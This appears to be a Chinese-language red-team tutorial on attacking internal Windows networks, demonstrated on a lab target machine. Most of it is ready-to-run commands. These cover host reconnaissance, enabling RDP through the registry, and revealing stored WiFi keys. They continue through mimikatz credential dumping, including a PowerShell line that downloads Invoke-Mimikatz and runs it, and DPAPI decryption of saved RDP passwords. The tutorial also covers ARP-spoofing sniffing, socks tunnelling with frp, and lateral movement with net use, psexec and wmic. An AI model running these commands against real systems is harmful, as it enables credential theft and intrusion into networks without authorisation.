0x01. 內網機器信息收集
1. 內網信息收集
內網是分布在一個區域性的網絡,也稱之為局域網,針對於內網不公開於互聯網之上,內網分為好幾種類型,有服務器內網、辦公區域內網等等,內網可以方便的傳輸,以及可以保證其數據的安全,其資產不亞於暴露外網的資產多,內網信息收集也是非常重要的。
作為紅隊來講,突破內網的前提下就是針對於內網的信息收集,內網的資產分布式很廣,不僅是WEB,甚至開放了各種危險端口,在內網中機器不保證其開防火牆,所以我們可以任由橫穿,假設內網機器大量沒有打補丁的ms17010漏洞,我們就可以橫穿其內網了。
再一方面,即使內網很安全,當我們收集到密碼之后去撞庫,測試一下密碼是否被重復使用,也可以實現攻破其他主機。
2. 內網信息收集隱蔽
在收集內網信息的前提下,我們需要針對管理員的登錄時間進行查看
net user administrator // 查看最后登錄時間
wevtutil epl security C:\System_log.evtx // 保存所有日志信息 , 需要管理員權限
舉例 : 使用物理機 , 遠程鏈接靶機 , 然后在靶機上執行導出日志 , 打開日志查看是否有遠程登錄信息
看到了剛才遠程鏈接電腦的IP地址啦
0x02. 內網信息收集命令
1. 內網本機信息收集命令-1
ipconfig /all 查詢本機IP信息是否多網卡
net user 查看本機有幾個賬戶
query user 查看在線的用戶
tasklist /v 顯示所有運行的進程
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" 查詢系統版本
systeminfo 查看補丁信息
net share 查看共享信息
netsh firewall show config 查看防火牆信息
net statistics workstation 查看開機時間
補充 :finsubnet(Mac).py 發現內網具有兩張網卡的主機
python27 finsubnet(Mac).py -i 192.168.1.1-192.168.1.254
2. 內網本機信息收集命令-2
wmic product get name,version 查看安裝軟件
net session 查看會話
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 開啟rdp
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 查看rdp對應的端口
net config workstation 查看是否存在域環境
netsh wlan show profiles 查看鏈接過的wifi
netsh wlan show profiles name="WiFi名稱" key=clear命令 查看具體wifi密碼
3. RDP連接歷史記錄
針對某些服務器/個人PC場景,我們可以使用以下命令查看連接過的記錄。
注意:是查看當前主機都用遠程鏈接鏈接過那些主機
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
4. 針對內網主機提權
使用命令 : systeminfo
將信息復制到即可自動尋找提權exp
http://bugs.hacking8.com/tiquan/
5. 內網資產的脆弱性
漏洞危害(CVE)
敏感信息泄露
服務弱口令
歷史密碼
瀏覽器記錄
連接歷史記錄 (xshell等等)
0x03. 內網主機探測及掃描
1. 內網穿透–流量代理
流量代理出網是將目標機器的內網代理出自己的機子,之后再進行掃描,一般代理出網的代理大部分都socks5、socks4,流量代理的工具有很多,個人感覺最好的還是Frp比較穩定。
內網流量轉發
#frpc.ini
[common]
server_addr = 0.0.0.0
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 6554
plugin = socks5
2. 內網區域大小探測
我們可以通過arp /a來觀察網段的總體情況
私有IP地址有10段、172段、192段,大小 : 從大到小排序的
A類地址
10.0.0.0--10.255.255.255
B類地址
172.16.0.0--172.31.255.255
C類地址
192.168.0.0--192.168.255.255
3. 內網主機存活檢測
存活檢測,可以使用批量Ping的方式或者使用其他工具軟件,也可以將流量代理出來進行掃描
使用NMAP或者其他方式進行檢測
當流量代理出來,我們可以使用 proxychains 去調用 nmap 進行對目標內網進行掃描
4. NTSCAN
NTSCAN是比較老的一款工具了,但是他的實用價值非常高,可以直接爆破內網內的主機
先設置賬號密碼字典
5. 內網弱口令檢測
在內網中必定充斥着大量的弱口令服務,所以我們可以對其弱口令進行探測
使用工具:超級弱口令檢查工具
6. 脆弱性WEB資產掃描
我們可以使用WebAliveScan對其內網進行脆弱性WEB資產掃描,首先我們收集存活的內網IP之后對其掃描。
地址: https:/lgithub.com/cangqingzhe/WebAliveScan
安裝 pip3 install -r requirements.txt
使用 :
python3 webscan.py --target target.txt --port 80
python3 webscan.py --target target.txt --port large
7. 內網流量嗅探
這款工具可以嗅探到內網的流量,並且可以主動收集內網的密碼,不過操作可能比較復奪這里我實操來演示
ARP欺騙 , 軟件使用教程
然后欺騙我們的靶機119那個
然后靶機119 , 登錄一個網站 , 這個站點是明文傳輸的 ,而且提交的字段在我們的字段字典中
返回攻擊機查看 , 得到賬號和密碼
補充 :關於ARP欺騙之前的筆記有詳細
0x04. 內網主機密碼收集
1. mimikatz抓取本機密碼
mimikatz是一款簡單且好用的windows密碼抓取神器,該軟件可幫助用戶一鍵抓取window密碼,操作簡單、使用方便。
在域滲透過程中另外一名老師會為大家講解mimikatz的一些高級使用,這里只做簡單介紹
進入到mimikatz目錄(必須system權限)
mimikatz.exe // 啟動工具
privilege::debug //提升權限
sekurlsa::logonpasswords //抓取密碼
一條命令也可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
//powershell遠程加載方式
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.156/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz
2. lazagne抓取密碼
LaZagne是一款功能比較多的抓取密碼工具,可以抓取windows、wifi、瀏覽器、數據庫等密碼。
下載地址: https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3
3. xshell密碼抓取密碼
在內網滲透中可能會發現連接ssh的相關信息,一般都是xshell程序,我們可以使用該程序來對xshell的密碼進行破
解,安裝以及生成exe的過程如下:
https://github.com/dzxs/Xdecrypt
4. SharpDecryptPwd密碼抓取工具
SharpDecryptPwd是一款強大的密碼解密工具,支持五種方式,包括native、teamviewer,filezilla、WinSCP、Xmanager。
https://github.com/uknowsec/SharpDecryptPwd
5. mimikatz獲取rdp連接記錄密碼
注意:是獲取當前主機鏈接過那些主機的3389記錄
1.查找本地的Credentials (證書) , 靶機執行
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
2.使用mimikatz進行操作 (管理員權限運行)
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B" "sekurlsa::dpapi" exit
jack是當前靶機的登錄用戶(x)
guidMasterkey是我們需要的
根據我們記錄的guidMasterkey得到MasterKey(加密密鑰)
* MasterKey : 3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
最后就差解密了,我這里面是 , 依然是在mimikatz中執行
dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B /masterkey:3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
參考鏈接 : https://blog.csdn.net/q1352483315/article/details/100075078
0x05. 內網橫向滲透演示
1. IPC空連接概述
前提是已經獲得了目標機器的賬號和密碼
IPC(Internet Process Connection)是共享"命名管道"的資源。
它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。
IPC是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c,d,e....和系統自錄winnt或windows(admin)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
2. 建立空連接命令
net share 查看本機共享
net use \\IP地址 "密碼" /user:用戶名 對其進行空連接
net use \\192.168.0.119\c$ "a" /user:"administrator"
net use \\IP地址 /del 刪除空連接
net time \\lP地址 查看機器時間
首先在攻擊機上用賬號和密碼進行空連接 , 然后文件管理中訪問靶機的C盤
補充 : 如果不能訪問可能是權限問題
3. PSEXEC橫向工具
微軟提供的一種遠程命令行工具
可直接用於對遠程主機進行命令交互
psexec.exe \\lP -u domainladministrator -p password command
psexec.exe \\192.168.0.119 -u administrator -p a cmd.exe
然后在靶機上查看
4. wmic橫向
wmic是一款Windows自帶的工具集,可以通過/node選項直接對遠程過程調用RPD訪問,允許直接執行命令。
wmic /node:192.168.0.119 /user:administrator /password:a # 連接后面拼接wmic命令
靶機ip
常見的vmic命令
process call create "cmd.exe" #啟動某一程序
process call create "msg jack a"
process call create "cmd.exe /c echo > c:\1.txt”
process list brief #查看所有進程
